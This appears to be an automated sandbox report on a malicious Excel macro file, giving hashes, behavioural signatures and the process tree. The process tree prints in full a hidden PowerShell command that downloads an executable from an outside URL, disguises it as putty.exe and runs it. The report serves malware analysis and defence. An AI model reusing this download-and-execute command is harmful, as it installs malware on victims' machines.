Analysis
-
max time kernel
130s -
max time network
136s -
platform
windows7_x64 -
resource
win7 -
submitted
08/07/2020, 07:45
Static task
static1
Behavioral task
behavioral1
Sample
Vouch_me.xlsm
Resource
win7
0 signatures
0 seconds
Behavioral task
behavioral2
Sample
Vouch_me.xlsm
Resource
win10v200430
0 signatures
0 seconds
General
-
Target
Vouch_me.xlsm
-
Size
48KB
-
MD5
7d50d1522e40087223060bc413bcf35d
-
SHA1
b1e708e5e73698623944736c81b86c6d58d230d4
-
SHA256
3d2f4071f4039fc8d0fa05ecc9cbad6f350e028dbae28f059d6f40446e688a16
-
SHA512
7cd7614be761191844f6506ee66d94cb4729ff3a7be33f96e2eba830fc1f079fa2897d5564f47349e227c233769acd6e5d30f43ffd4232207fd92e25905d7abe
Score
10/10
Malware Config
Extracted
Language
ps1
Source
URLs
exe.dropper
https://seedwellresources.xyz/uT5wiEYASje8CME.exe
Signatures
-
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 1412 wrote to memory of 300 1412 EXCEL.EXE 24 PID 1412 wrote to memory of 300 1412 EXCEL.EXE 24 PID 1412 wrote to memory of 300 1412 EXCEL.EXE 24 -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 300 powershell.exe -
Blacklisted process makes network request 1 IoCs
flow pid Process 5 300 powershell.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 1412 EXCEL.EXE -
Suspicious use of SetWindowsHookEx 5 IoCs
pid Process 1412 EXCEL.EXE 1412 EXCEL.EXE 1412 EXCEL.EXE 1412 EXCEL.EXE 1412 EXCEL.EXE -
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Program Files\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process 300 1412 powershell.exe 23 -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 300 powershell.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 300 powershell.exe -
Office loads VBA resources, possible macro or embedded object present
Processes
-
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\Vouch_me.xlsm1⤵
- Suspicious use of WriteProcessMemory
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:1412 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -W Hidden -command (new-object System.Net.WebClient).DownloadFile('https://seedwellresources.xyz/uT5wiEYASje8CME.exe',$env:Temp+'\putty.exe');(New-Object -com Shell.Application).ShellExecute($env:Temp+'\putty.exe')2⤵
- Suspicious use of AdjustPrivilegeToken
- Blacklisted process makes network request
- Process spawned unexpected child process
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
PID:300
-